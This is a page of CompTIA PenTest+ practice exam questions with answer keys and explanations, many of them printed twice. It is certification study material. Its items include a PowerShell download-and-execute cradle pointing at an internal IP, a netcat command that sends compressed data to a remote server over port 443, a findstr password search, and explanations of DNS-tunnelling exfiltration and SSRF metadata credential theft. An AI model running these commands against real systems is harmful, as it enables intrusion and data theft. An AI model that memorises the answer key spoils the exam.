Practice Free PT0-003 Exam Online Questions
Question #51
Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?
- A . Customer authorization
- B . Penetration tester authorization
- C . Third-party authorization
- D . Internal team authorization
Correct Answer: A
A
Explanation:
Comprehensive and Detailed
Before any penetration testing begins ― especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms ― a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s not mandatory.
D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
Domain 1.0: Planning and Scoping
A
Explanation:
Comprehensive and Detailed
Before any penetration testing begins ― especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms ― a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
B. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
C. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it’s not mandatory.
D. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
Domain 1.0: Planning and Scoping
Question #52
Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("")[1] If ($1 -eq "administrator") {
echo IEX(New-Object Net.WebClient).Downloadstring(‘http://10.10.11.12:8080/ul/windows.ps1’) | powershell -noprofile -}
Which of the following is the penetration tester most likely trying to do?
- A . Change the system’s wallpaper based on the current user’s preferences.
- B . Capture the administrator’s password and transmit it to a remote server.
- C . Conditionally stage and execute a remote script.
- D . Log the internet browsing history for a systems administrator.
Correct Answer: C
C
Explanation:
Script Breakdown:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("")[1]: Retrieves the current username.
If ($1 -eq "administrator"): Checks if the current user is "administrator".
echo IEX(New-Object Net.WebClient).Downloadstring(‘http://10.10.11.12:8080/ul/windows.ps1’) |
powershell -noprofile -}: If the user is "administrator", downloads and executes a PowerShell script
from a remote server.
Purpose:
Conditional Execution: Ensures the script runs only if executed by an administrator.
Remote Script Execution: Uses IEX (Invoke-Expression) to download and execute a script from a remote server, a common method for staging payloads.
Why This is the Best Choice:
This script aims to conditionally download and execute a remote script based on the user’s privileges. It is designed to stage further attacks or payloads only if the current user has administrative privileges.
Reference from Pentesting Literature:
The technique of conditionally executing scripts based on user privileges and using remote script execution is discussed in penetration testing guides and is a common tactic in various HTB write-ups.
Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
C
Explanation:
Script Breakdown:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("")[1]: Retrieves the current username.
If ($1 -eq "administrator"): Checks if the current user is "administrator".
echo IEX(New-Object Net.WebClient).Downloadstring(‘http://10.10.11.12:8080/ul/windows.ps1’) |
powershell -noprofile -}: If the user is "administrator", downloads and executes a PowerShell script
from a remote server.
Purpose:
Conditional Execution: Ensures the script runs only if executed by an administrator.
Remote Script Execution: Uses IEX (Invoke-Expression) to download and execute a script from a remote server, a common method for staging payloads.
Why This is the Best Choice:
This script aims to conditionally download and execute a remote script based on the user’s privileges. It is designed to stage further attacks or payloads only if the current user has administrative privileges.
Reference from Pentesting Literature:
The technique of conditionally executing scripts based on user privileges and using remote script execution is discussed in penetration testing guides and is a common tactic in various HTB write-ups.
Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
Question #53
Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?
- A . FTP
- B . HTTPS
- C . SMTP
- D . DNS
Correct Answer: D
D
Explanation:
Covert data exfiltration is a crucial aspect of advanced penetration testing. Penetration testers often need to move data out of a network without being detected by the organization’s security monitoring tools.
Here’s a breakdown of the potential methods and why DNS is the preferred choice for covert data exfiltration:
FTP (File Transfer Protocol) (Option A):
Characteristics: FTP is a clear-text protocol used to transfer files.
Drawbacks: It is easily detected by network security tools due to its lack of encryption and distinctive traffic patterns. Most modern networks block or heavily monitor FTP traffic to prevent unauthorized file transfers.
Reference: The use of FTP in penetration testing is often limited to environments where encryption is not a concern or for internal transfers where monitoring is lax. It’s rarely used for covert exfiltration due to its high detectability.
HTTPS (Hypertext Transfer Protocol Secure) (Option B):
Characteristics: HTTPS encrypts data in transit, making it harder to inspect by network monitoring tools.
Drawbacks: While HTTPS is more secure, large amounts of unusual or unexpected HTTPS traffic can still trigger alerts on sophisticated security systems. Its usage for exfiltration depends on the network’s normal traffic patterns and the ability to blend in.
Reference: HTTPS is used when there is a need to encrypt data during exfiltration. However, it can still be flagged by traffic analysis tools if the data patterns or destinations are unusual. SMTP (Simple Mail Transfer Protocol) (Option C):
Characteristics: SMTP is used for sending emails.
Drawbacks: Like FTP, SMTP is not inherently secure and can be monitored. Additionally, large or frequent email attachments can trigger alerts.
Reference: SMTP might be used in some exfiltration scenarios but is generally considered risky due to the ease of monitoring email traffic.
DNS (Domain Name System) (Option D):
Characteristics: DNS is used to resolve domain names to IP addresses and vice versa.
Advantages: DNS traffic is ubiquitous and often less scrutinized than other types of traffic. Data can be encoded into DNS queries and responses, making it an effective covert channel for exfiltration.
Reference: Many penetration tests and red team engagements leverage DNS tunneling for covert data exfiltration due to its ability to bypass firewalls and intrusion detection systems. This technique involves encoding data within DNS queries to an attacker-controlled domain, effectively evading detection.
Conclusion: DNS tunneling stands out as the most effective method for covert data exfiltration due to its ability to blend in with normal network traffic and avoid detection by conventional security mechanisms. Penetration testers utilize this method to evade scrutiny while exfiltrating data.
D
Explanation:
Covert data exfiltration is a crucial aspect of advanced penetration testing. Penetration testers often need to move data out of a network without being detected by the organization’s security monitoring tools.
Here’s a breakdown of the potential methods and why DNS is the preferred choice for covert data exfiltration:
FTP (File Transfer Protocol) (Option A):
Characteristics: FTP is a clear-text protocol used to transfer files.
Drawbacks: It is easily detected by network security tools due to its lack of encryption and distinctive traffic patterns. Most modern networks block or heavily monitor FTP traffic to prevent unauthorized file transfers.
Reference: The use of FTP in penetration testing is often limited to environments where encryption is not a concern or for internal transfers where monitoring is lax. It’s rarely used for covert exfiltration due to its high detectability.
HTTPS (Hypertext Transfer Protocol Secure) (Option B):
Characteristics: HTTPS encrypts data in transit, making it harder to inspect by network monitoring tools.
Drawbacks: While HTTPS is more secure, large amounts of unusual or unexpected HTTPS traffic can still trigger alerts on sophisticated security systems. Its usage for exfiltration depends on the network’s normal traffic patterns and the ability to blend in.
Reference: HTTPS is used when there is a need to encrypt data during exfiltration. However, it can still be flagged by traffic analysis tools if the data patterns or destinations are unusual. SMTP (Simple Mail Transfer Protocol) (Option C):
Characteristics: SMTP is used for sending emails.
Drawbacks: Like FTP, SMTP is not inherently secure and can be monitored. Additionally, large or frequent email attachments can trigger alerts.
Reference: SMTP might be used in some exfiltration scenarios but is generally considered risky due to the ease of monitoring email traffic.
DNS (Domain Name System) (Option D):
Characteristics: DNS is used to resolve domain names to IP addresses and vice versa.
Advantages: DNS traffic is ubiquitous and often less scrutinized than other types of traffic. Data can be encoded into DNS queries and responses, making it an effective covert channel for exfiltration.
Reference: Many penetration tests and red team engagements leverage DNS tunneling for covert data exfiltration due to its ability to bypass firewalls and intrusion detection systems. This technique involves encoding data within DNS queries to an attacker-controlled domain, effectively evading detection.
Conclusion: DNS tunneling stands out as the most effective method for covert data exfiltration due to its ability to blend in with normal network traffic and avoid detection by conventional security mechanisms. Penetration testers utilize this method to evade scrutiny while exfiltrating data.
Question #54
Which of the following will reduce the possibility of introducing errors or bias in a penetration test report?
- A . Secure distribution
- B . Peer review
- C . Use AI
- D . Goal reprioritization
Correct Answer: B
B
Explanation:
A peer review process ensures that a penetration test report is accurate, unbiased, and free from errors.
Peer review (Option B):
Senior security professionals verify findings, risk levels, and remediation recommendations.
Reduces the risk of misinterpretation or incorrect data in reports.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Best Practices for Penetration Testing Reports"
Incorrect options:
Option A (Secure distribution): Ensures confidentiality, but does not reduce report errors.
Option C (Use AI): AI can assist in analysis, but human verification is essential.
Option D (Goal reprioritization): Changes testing objectives, not report accuracy.
B
Explanation:
A peer review process ensures that a penetration test report is accurate, unbiased, and free from errors.
Peer review (Option B):
Senior security professionals verify findings, risk levels, and remediation recommendations.
Reduces the risk of misinterpretation or incorrect data in reports.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Best Practices for Penetration Testing Reports"
Incorrect options:
Option A (Secure distribution): Ensures confidentiality, but does not reduce report errors.
Option C (Use AI): AI can assist in analysis, but human verification is essential.
Option D (Goal reprioritization): Changes testing objectives, not report accuracy.
Question #55
A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information: Server-side request forgery (SSRF) vulnerability in test.comptia.org
Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org
Publicly accessible storage system named static_comptia_assets
SSH port 22 open to the internet on test3.comptia.org
Open redirect vulnerability in test4.comptia.org
Which of the following attack paths should the tester prioritize first?
- A . Synchronize all the information from the public bucket and scan it with Trufflehog.
- B . Run Pacu to enumerate permissions and roles within the cloud-based systems.
- C . Perform a full dictionary brute-force attack against the open SSH service using Hydra.
- D . Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.
- E . Leverage the SSRF to gain access to credentials from the metadata service.
Correct Answer: E
E
Explanation:
Leverage SSRF for Metadata Access:
Server-side request forgery (SSRF) vulnerabilities allow attackers to force a server to send requests to
internal resources. In cloud environments, SSRF can often be used to access the metadata service
(e.g., AWS EC2 metadata) to retrieve credentials for cloud services.
Once credentials are obtained, they can be used to access privileged systems that are not directly
accessible from the internet.
Why Not Other Options?
A (Public bucket): Analyzing the bucket for sensitive data is useful but does not directly lead to privileged system access.
B (Pacu): Pacu is used for AWS exploitation but requires credentials or misconfigured roles. SSRF can provide the credentials needed to run Pacu effectively.
C (SSH brute force): Brute-forcing SSH is noisy and inefficient. Privileged systems are likely better protected than SSH open to the internet.
D (Phishing via XSS): This is a longer-term attack and less direct compared to leveraging SSRF.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
SSRF Exploitation and Cloud Metadata Access Techniques
E
Explanation:
Leverage SSRF for Metadata Access:
Server-side request forgery (SSRF) vulnerabilities allow attackers to force a server to send requests to
internal resources. In cloud environments, SSRF can often be used to access the metadata service
(e.g., AWS EC2 metadata) to retrieve credentials for cloud services.
Once credentials are obtained, they can be used to access privileged systems that are not directly
accessible from the internet.
Why Not Other Options?
A (Public bucket): Analyzing the bucket for sensitive data is useful but does not directly lead to privileged system access.
B (Pacu): Pacu is used for AWS exploitation but requires credentials or misconfigured roles. SSRF can provide the credentials needed to run Pacu effectively.
C (SSH brute force): Brute-forcing SSH is noisy and inefficient. Privileged systems are likely better protected than SSH open to the internet.
D (Phishing via XSS): This is a longer-term attack and less direct compared to leveraging SSRF.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
SSRF Exploitation and Cloud Metadata Access Techniques
Question #55
A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information: Server-side request forgery (SSRF) vulnerability in test.comptia.org
Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org
Publicly accessible storage system named static_comptia_assets
SSH port 22 open to the internet on test3.comptia.org
Open redirect vulnerability in test4.comptia.org
Which of the following attack paths should the tester prioritize first?
- A . Synchronize all the information from the public bucket and scan it with Trufflehog.
- B . Run Pacu to enumerate permissions and roles within the cloud-based systems.
- C . Perform a full dictionary brute-force attack against the open SSH service using Hydra.
- D . Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.
- E . Leverage the SSRF to gain access to credentials from the metadata service.
Correct Answer: E
E
Explanation:
Leverage SSRF for Metadata Access:
Server-side request forgery (SSRF) vulnerabilities allow attackers to force a server to send requests to
internal resources. In cloud environments, SSRF can often be used to access the metadata service
(e.g., AWS EC2 metadata) to retrieve credentials for cloud services.
Once credentials are obtained, they can be used to access privileged systems that are not directly
accessible from the internet.
Why Not Other Options?
A (Public bucket): Analyzing the bucket for sensitive data is useful but does not directly lead to privileged system access.
B (Pacu): Pacu is used for AWS exploitation but requires credentials or misconfigured roles. SSRF can provide the credentials needed to run Pacu effectively.
C (SSH brute force): Brute-forcing SSH is noisy and inefficient. Privileged systems are likely better protected than SSH open to the internet.
D (Phishing via XSS): This is a longer-term attack and less direct compared to leveraging SSRF.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
SSRF Exploitation and Cloud Metadata Access Techniques
E
Explanation:
Leverage SSRF for Metadata Access:
Server-side request forgery (SSRF) vulnerabilities allow attackers to force a server to send requests to
internal resources. In cloud environments, SSRF can often be used to access the metadata service
(e.g., AWS EC2 metadata) to retrieve credentials for cloud services.
Once credentials are obtained, they can be used to access privileged systems that are not directly
accessible from the internet.
Why Not Other Options?
A (Public bucket): Analyzing the bucket for sensitive data is useful but does not directly lead to privileged system access.
B (Pacu): Pacu is used for AWS exploitation but requires credentials or misconfigured roles. SSRF can provide the credentials needed to run Pacu effectively.
C (SSH brute force): Brute-forcing SSH is noisy and inefficient. Privileged systems are likely better protected than SSH open to the internet.
D (Phishing via XSS): This is a longer-term attack and less direct compared to leveraging SSRF.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
SSRF Exploitation and Cloud Metadata Access Techniques
Question #57
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement.
Given the following firewall policy:
Action | SRC
| DEST
| —
Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP
Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24:443 | TCP
Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0:443 | TCP
Block |. |. | *
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz ‘ nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
Correct Answer: A
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are: Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are: Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
Question #58
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C:"pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
- A . Configuration files
- B . Permissions
- C . Virtual hosts
- D . Secrets
Correct Answer: D
D
Explanation:
By running the command findstr /SIM /C:"pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Command Analysis:
findstr: A command-line utility in Windows used to search for specific strings in files.
/SIM: Combination of options; /S searches for matching files in the current directory and all subdirectories, /I specifies a case-insensitive search, and /M prints only the filenames with matching content.
/C:"pass": Searches for the literal string "pass".
***.txt .cfg .xml: Specifies the file types to search within.
Objective:
The command is searching for the string "pass" within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).
These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.
Other Options:
Configuration files: While .cfg and .xml files can be configuration files, the specific search for "pass" indicates looking for secrets like passwords.
Permissions: This command does not check or enumerate file permissions.
Virtual hosts: This command is not related to enumerating virtual hosts.
Pentest
Reference: Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation
activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
D
Explanation:
By running the command findstr /SIM /C:"pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Command Analysis:
findstr: A command-line utility in Windows used to search for specific strings in files.
/SIM: Combination of options; /S searches for matching files in the current directory and all subdirectories, /I specifies a case-insensitive search, and /M prints only the filenames with matching content.
/C:"pass": Searches for the literal string "pass".
***.txt .cfg .xml: Specifies the file types to search within.
Objective:
The command is searching for the string "pass" within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).
These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.
Other Options:
Configuration files: While .cfg and .xml files can be configuration files, the specific search for "pass" indicates looking for secrets like passwords.
Permissions: This command does not check or enumerate file permissions.
Virtual hosts: This command is not related to enumerating virtual hosts.
Pentest
Reference: Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation
activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
Question #59
Which of the following frameworks can be used to classify threats?
- A . PTES
- B . STRIDE
- C . OSSTMM
- D . OCTAVE
Correct Answer: B
B
Explanation:
STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:
Spoofing
Tampering
Repudiation
Information disclosure
Denial of Service
Elevation of privilege
It is specifically designed for threat modeling.
PTES is a general pentesting methodology.
OSSTMM is a framework for operational security testing.
OCTAVE is a risk assessment methodology, not focused on threat classification.
Reference: PT0-003 Objective 3.1 C Understand and apply threat modeling methodologies like STRIDE.
B
Explanation:
STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:
Spoofing
Tampering
Repudiation
Information disclosure
Denial of Service
Elevation of privilege
It is specifically designed for threat modeling.
PTES is a general pentesting methodology.
OSSTMM is a framework for operational security testing.
OCTAVE is a risk assessment methodology, not focused on threat classification.
Reference: PT0-003 Objective 3.1 C Understand and apply threat modeling methodologies like STRIDE.
Question #60
A penetration tester needs to test a very large number of URLs for public access.
Given the following code snippet:
1 import requests
2 import pathlib
3
4 for url in pathlib.Path("urls.txt").read_text().split("n"):
5 response = requests.get(url)
6 if response.status == 401:
7 print("URL accessible")
Which of the following changes is required?
- A . The condition on line 6
- B . The method on line 5
- C . The import on line 1
- D . The delimiter in line 3
Correct Answer: A
A
Explanation:
Script Analysis:
Line 1: import requests – Imports the requests library to handle HTTP requests.
Line 2: import pathlib – Imports the pathlib library to handle file paths.
Line 4: for url in pathlib.Path("urls.txt").read_text().split("n"): – Reads the urls.txt file, splits its contents by newline, and iterates over each URL.
Line 5: response = requests.get(url) – Sends a GET request to the URL and stores the response.
Line 6: if response.status == 401: – Checks if the response status code is 401 (Unauthorized).
Line 7: print("URL accessible") – Prints a message indicating the URL is accessible.
Error Identification:
The condition if response.status == 401: is incorrect for determining if a URL is publicly accessible. A 401 status code indicates that the resource requires authentication.
Correct Condition:
The correct condition should check for a 200 status code, which indicates that the request was successful and the resource is accessible.
Corrected Script:
Replace if response.status == 401: with if response.status_code == 200: to correctly identify publicly accessible URLs.
Pentest
Reference: In penetration testing, checking the accessibility of multiple URLs is a common task, often part of reconnaissance. Identifying publicly accessible resources can reveal potential entry points for further testing.
The requests library in Python is widely used for making HTTP requests and handling responses.
Understanding HTTP status codes is crucial for correctly interpreting the results of these requests.
By changing the condition to check for a 200 status code, the script will correctly identify and print URLs that are publicly accessible.
A
Explanation:
Script Analysis:
Line 1: import requests – Imports the requests library to handle HTTP requests.
Line 2: import pathlib – Imports the pathlib library to handle file paths.
Line 4: for url in pathlib.Path("urls.txt").read_text().split("n"): – Reads the urls.txt file, splits its contents by newline, and iterates over each URL.
Line 5: response = requests.get(url) – Sends a GET request to the URL and stores the response.
Line 6: if response.status == 401: – Checks if the response status code is 401 (Unauthorized).
Line 7: print("URL accessible") – Prints a message indicating the URL is accessible.
Error Identification:
The condition if response.status == 401: is incorrect for determining if a URL is publicly accessible. A 401 status code indicates that the resource requires authentication.
Correct Condition:
The correct condition should check for a 200 status code, which indicates that the request was successful and the resource is accessible.
Corrected Script:
Replace if response.status == 401: with if response.status_code == 200: to correctly identify publicly accessible URLs.
Pentest
Reference: In penetration testing, checking the accessibility of multiple URLs is a common task, often part of reconnaissance. Identifying publicly accessible resources can reveal potential entry points for further testing.
The requests library in Python is widely used for making HTTP requests and handling responses.
Understanding HTTP status codes is crucial for correctly interpreting the results of these requests.
By changing the condition to check for a 200 status code, the script will correctly identify and print URLs that are publicly accessible.